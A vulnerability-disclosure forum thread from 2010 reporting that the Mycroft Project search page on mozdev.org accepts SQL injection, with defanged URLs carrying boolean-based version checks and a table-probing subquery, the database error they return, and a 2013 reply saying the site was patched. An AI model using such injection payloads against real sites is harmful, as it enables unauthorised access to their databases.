Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: VMw4r3
Date: August 23, 2010 04:46PM


Mycroft Project is vulnerable to sql injection.



Mysql version check:

hxxttp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=4 <-----true

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and substring(@@version,1,1)=5 <-----false

Error generated looking for inexistent user table:

hxxp://mycroft.mozdev.org/search-engines.html?category=64 and (select 1 from user limit 0,1)=1
error = SELECT command denied to user 'pr_mycroft'@'localhost' for table 'user'


Options: ReplyQuote
Re: mozdev.org Mycroft Project: Vulnerable to sql injection
Posted by: us3r
Date: July 03, 2013 12:01PM

After 3 years the site has been patching! :)

Options: ReplyQuote

Sorry, only registered users may post in this forum.